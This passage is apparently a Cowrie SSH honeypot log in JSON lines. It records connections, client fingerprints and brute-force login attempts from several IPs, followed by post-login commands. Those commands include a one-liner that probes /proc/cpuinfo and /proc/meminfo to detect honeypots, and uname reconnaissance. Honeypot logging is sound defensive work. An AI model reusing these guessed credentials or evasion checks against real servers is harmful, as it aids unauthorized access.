03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:01:23.076742Z","src_ip":"199.195.253.95","session":"029e18d3d936"}
{"eventid":"cowrie.login.failed","username":"mostafa","password":"12345","message":"login attempt [mostafa/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T18:01:23.736196Z","src_ip":"199.195.253.95","session":"029e18d3d936"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:01:24.922702Z","src_ip":"199.195.253.95","session":"029e18d3d936"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.185","src_port":41330,"dst_ip":"1.2.3.4","dst_port":22,"session":"dff48765fc96","protocol":"ssh","message":"New connection: 171.243.150.185:41330 (1.2.3.4:22) [session: dff48765fc96]","sensor":"my-vps","timestamp":"2025-08-28T18:01:26.890437Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T18:01:26.892175Z","src_ip":"171.243.150.185","session":"dff48765fc96"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T18:01:28.622540Z","src_ip":"171.243.150.185","session":"dff48765fc96"}
{"eventid":"cowrie.login.failed","username":"support","password":"admin","message":"login attempt [support/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T18:01:47.690385Z","src_ip":"171.243.150.185","session":"dff48765fc96"}
{"eventid":"cowrie.session.closed","duration":"22.6","message":"Connection lost after 22.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:01:49.469380Z","src_ip":"171.243.150.185","session":"dff48765fc96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41758,"dst_ip":"1.2.3.4","dst_port":22,"session":"aeeacdd7b4c4","protocol":"ssh","message":"New connection: 212.227.235.229:41758 (1.2.3.4:22) [session: aeeacdd7b4c4]","sensor":"my-vps","timestamp":"2025-08-28T18:01:54.404840Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:01:54.405619Z","src_ip":"212.227.235.229","session":"aeeacdd7b4c4"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T18:01:54.512084Z","src_ip":"212.227.235.229","session":"aeeacdd7b4c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52550,"dst_ip":"1.2.3.4","dst_port":22,"session":"97346cf4a5ef","protocol":"ssh","message":"New connection: 212.227.125.160:52550 (1.2.3.4:22) [session: 97346cf4a5ef]","sensor":"my-vps","timestamp":"2025-08-28T18:01:54.707498Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:01:54.708175Z","src_ip":"212.227.125.160","session":"97346cf4a5ef"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T18:01:54.750974Z","src_ip":"212.227.125.160","session":"97346cf4a5ef"}
{"eventid":"cowrie.login.failed","username":"sol","password":"1234","message":"login attempt [sol/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T18:01:54.831114Z","src_ip":"212.227.235.229","session":"aeeacdd7b4c4"}
{"eventid":"cowrie.login.success","username":"root","password":"00000000","message":"login attempt [root/00000000] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:01:54.880316Z","src_ip":"212.227.125.160","session":"97346cf4a5ef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:01:54.995108Z","src_ip":"212.227.125.160","session":"97346cf4a5ef"}
{"eventid":"cowrie.command.input","input":"cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","message":"CMD: cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","sensor":"my-vps","timestamp":"2025-08-28T18:01:54.996345Z","src_ip":"212.227.125.160","session":"97346cf4a5ef"}
{"eventid":"cowrie.command.input","input":"grep model name /proc/cpuinfo 2 > /dev/null","message":"CMD: grep model name /proc/cpuinfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T18:01:54.997490Z","src_ip":"212.227.125.160","session":"97346cf4a5ef"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T18:01:55.001012Z","src_ip":"212.227.125.160","session":"97346cf4a5ef"}
{"eventid":"cowrie.command.input","input":"grep MemTotal /proc/meminfo 2 > /dev/null","message":"CMD: grep MemTotal /proc/meminfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T18:01:55.002292Z","src_ip":"212.227.125.160","session":"97346cf4a5ef"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T18:01:55.004504Z","src_ip":"212.227.125.160","session":"97346cf4a5ef"}
{"eventid":"cowrie.command.failed","input":"if [ -z ]","message":"Command not found: if [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T18:01:55.006468Z","src_ip":"212.227.125.160","session":"97346cf4a5ef"}
{"eventid":"cowrie.command.failed","input":"[ -z ]","message":"Command not found: [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T18:01:55.007652Z","src_ip":"212.227.125.160","session":"97346cf4a5ef"}
{"eventid":"cowrie.command.failed","input":"then","message":"Command not found: then","sensor":"my-vps","timestamp":"2025-08-28T18:01:55.008909Z","src_ip":"212.227.125.160","session":"97346cf4a5ef"}
{"eventid":"cowrie.command.failed","input":"else","message":"Command not found: else","sensor":"my-vps","timestamp":"2025-08-28T18:01:55.010737Z","src_ip":"212.227.125.160","session":"97346cf4a5ef"}
{"eventid":"cowrie.command.failed","input":"fi","message":"Command not found: fi","sensor":"my-vps","timestamp":"2025-08-28T18:01:55.012325Z","src_ip":"212.227.125.160","session":"97346cf4a5ef"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","shasum":"070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","destfile":"/dev/null","message":"Saved redir contents with SHA-256 070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac to var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","sensor":"my-vps","timestamp":"2025-08-28T18:01:55.115654Z","src_ip":"212.227.125.160","session":"97346cf4a5ef"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","size":289,"shasum":"69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:01:55.116613Z","src_ip":"212.227.125.160","session":"97346cf4a5ef"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:01:55.117821Z","src_ip":"212.227.125.160","session":"97346cf4a5ef"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:01:55.939499Z","src_ip":"212.227.235.229","session":"aeeacdd7b4c4"}
{"eventid":"cowrie.login.failed","username":"operator","password":"operator","message":"login attempt [operator/operator] failed","sensor":"my-vps","timestamp":"2025-08-28T18:01:57.277913Z","src_ip":"212.227.125.160","session":"8b15d7715a45"}
{"eventid":"cowrie.session.closed","duration":"58.8","message":"Connection lost after 58.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:01:58.505434Z","src_ip":"212.227.125.160","session":"8b15d7715a45"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43810,"dst_ip":"1.2.3.4","dst_port":22,"session":"b894affff632","protocol":"ssh","message":"New connection: 212.227.235.229:43810 (1.2.3.4:22) [session: b894affff632]","sensor":"my-vps","timestamp":"2025-08-28T18:01:59.484133Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:01:59.484874Z","src_ip":"212.227.235.229","session":"b894affff632"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T18:01:59.584780Z","src_ip":"212.227.235.229","session":"b894affff632"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ\"WSX\u00a3EDC$RFV%TGB^YHN","message":"login attempt [root/!QAZ\"WSX\u00a3EDC$RFV%TGB^YHN] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:01:59.885518Z","src_ip":"212.227.235.229","session":"b894affff632"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:02:00.103063Z","src_ip":"212.227.235.229","session":"b894affff632"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T18:02:00.104088Z","src_ip":"212.227.235.229","session":"b894affff632"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:02:00.213090Z","src_ip":"212.227.235.229","session":"b894affff632"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:02:00.214636Z","src_ip":"212.227.235.229","session":"b894affff632"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39189,"dst_ip":"1.2.3.4","dst_port":22,"session":"a38b20665b01","protocol":"ssh","message":"New connection: 212.227.125.160:39189 (1.2.3.4:22) [session: a38b20665b01]","sensor":"my-vps","timestamp":"2025-08-28T18:02:09.800361Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T18:02:09.801296Z","src_ip":"212.227.125.160","session":"a38b20665b01"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T18:02:09.881481Z","src_ip":"212.227.125.160","session":"a38b20665b01"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T18:02:10.286430Z","src_ip":"212.227.125.160","session":"a38b20665b01"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:02:11.369025Z","src_ip":"212.227.125.160","session":"a38b20665b01"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36900,"dst_ip":"1.2.3.4","dst_port":22,"session":"d16f35778b7b","protocol":"ssh","message":"New connection: 212.227.125.160:36900 (1.2.3.4:22) [session: d16f35778b7b]","sensor":"my-vps","timestamp":"2025-08-28T18:02:29.794632Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T18:02:29.801217Z","src_ip":"212.227.125.160","session":"d16f35778b7b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T18:02:30.040101Z","src_ip":"212.227.125.160","session":"d16f35778b7b"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":60938,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1ddc367f6c6","protocol":"ssh","message":"New connection: 199.195.253.95:60938 (1.2.3.4:22) [session: b1ddc367f6c6]","sensor":"my-vps","timestamp":"2025-08-28T18:02:31.457473Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:02:31.465375Z","src_ip":"199.195.253.95","session":"b1ddc367f6c6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:02:31.550540Z","src_ip":"199.195.253.95","session":"b1ddc367f6c6"}
{"eventid":"cowrie.login.success","username":"root","password":"qazwsx123","message":"login attempt [root/qazwsx123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:02:31.911190Z","src_ip":"199.195.253.95","session":"b1ddc367f6c6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:02:32.158625Z","src_ip":"199.195.253.95","session":"b1ddc367f6c6"}
